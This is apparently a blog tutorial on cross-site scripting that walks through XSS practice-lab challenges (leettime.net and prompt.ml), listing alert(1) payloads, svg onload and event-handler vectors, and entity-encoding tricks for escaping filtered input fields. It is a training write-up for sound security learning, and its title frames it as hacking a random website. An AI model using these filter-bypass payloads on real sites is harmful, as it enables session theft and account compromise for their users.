XSS Cross Site Scripting

XSS Vulns–Cross SITE SCRIPTING

  • Allow an attacker to inject JavaScript code into the page.
  • Code is executed when the page loads.
  • Code is executed on the client machine not the server.

Three main types of XSS Cross Site Scripting

  1. Persistent/stored XSS
  2. Reflected XSS
  3. DOM based XSS

Hacking A Random Website With Xss Cross Site Scripting | Kali Linux!!Cross Site Scripting ON Lab



Basic XSS – Cross site scripting to bypass the parameter. Leettime.net to test basic XSS there are total 8 challenges to bypass.
Cross site scripting on Lab
Lab Link - http://leettime.net/xsslab1/
 
<script>alert(1)</script>
browser execute html
 
we know that JavaScript can work with html
 
<input type="text" name="name" value=batman></input>
 
<input type="text" name="name" value=<script>alert(1)</script>></input>
 
<input type="text" name="name" value=>batman></input>
 
payload = ><script>alert(1)</script>
 
 
Challenge 3:
 
<input type="text" name="name" value="spiderman"></input>
 
payload = "><script>alert(1)</script>
 
 
Challenge 4 :
 
<input type="text" name="name" value='ironman'></input>
 
 
payload = '><script>alert(1)</script>
 
Challenge 5 :
 
<center><script>var search_str="hello";</script>
 
payload : </script><script>alert(1)</script>
 
Challege 6 : <center><script>var search_str='hello';</script>
 
 
Payload = ';</script><script>alert(1)</script>
 
payload2 : </script><script>alert(1)</script>
 
Challenge 7 :
 
keyboard input will become a string response you can try to give input through mouse
 
onmouseover=alert(1);
 
'onmouseover='alert(1);
 
if your input correctly placed outside of any html tag then js will execute there
 
"onmouseover="alert(1);
 

Manual building XSS Vector

Lab Link – https://prompt.ml/0

Manual Building XSS Vector

Lab Link – http://prompt.ml/

1.

<svg/onload=alert(1);

whenever your input reflect as a plain text you should use svg vector

( – &#40;

whenever they take url as a input filed you can try to inject paylod through a file

test.js

<script>alert(1)</script>

when something will fileterd you can convert that into html code so browser directly execute that

<p> tag reprents plain text

<svg> vectors payload

challeneg 7 :

they are only taking  12 characters

<svg/onload=alert(1)

<p class=”comment” title=”<svg/onload=”></p>

<svg/a=#”onload=’/*#*/alert(1)’

<script>hello</script>

alert(1)

challenge 15

<p class=”comment” title=”hello” data-comment='{“id”:0}’></p>

svg vectors

<svg><!–#–><script><!–#–>alert(1)<!–#–></script>

Challenges:

Level 0

Input some random words to execute from the text field as you can see the source below the hello field is executing the forum of hello string and its ending with “> so the payload we will create is

“><script>alert(1)</script>

Because the we have to make value field to be end so that time our payload will execute later on.

 Level 1

If you input a payload on the text field it will execute as an article type so in this case we need to try something else to be execute so we will use SVG tag

SVG is a language for describing 2D graphics in XML. Canvas draws 2D graphics, on the fly (with a JavaScript). SVG is XML based, which means that every element is available within the SVG DOM. You can attach JavaScript event handlers for an element.

The onload event occurs when an object has been loaded.

onload is most often used within the <body> element to execute a script once a web page has completely loaded all content (including images, script files, CSS files, etc.).

                USAGE:  <svg/onload=alert(1);

Level 2

https://www.w3schools.com/html/html_charset.asp

whenever your input reflects as a plain text you should use svg vector

( – &#40;

USAGE: <svg><script>alert&#40;1</script>

Level 3

*Note:                   <!– –hello –>  the opening and closing are the HTML comments side

USAGE: –!><script>alert(1)</script>

Level 4

whenever they take URL as a input filed you can try to inject payload through a file

test.js

USAGE: http://promt.ml/js/test.js

Level 5

when something will be fileted, you can convert that into html code so browser directly execute that.

Usage: hello”type=image src onerror=”alert(1)

Level 7

Hello word is reflecting by <p> tag so its mean plain text_ so in that case you have to use svg vector payload for the code to be executing.

In this syntax onload will not excute in single line because the syntax has taken as plain text so we need to comment the strings to be excute later will # and a=#’onload a is variable and we put the value to be excute through the variable a.

USAGE: “><svg/a=#”onload=’/*#*/alert(1)’

Level A

Alert(1)

Level F<p class=”comment” title=”hello” data-comment='{“id”:0}’></p>

svg vectors

<svg><!–#–><script><!–#–>alert(1)<!–#–></script>

LEAVE A REPLY

Please enter your comment!
Please enter your name here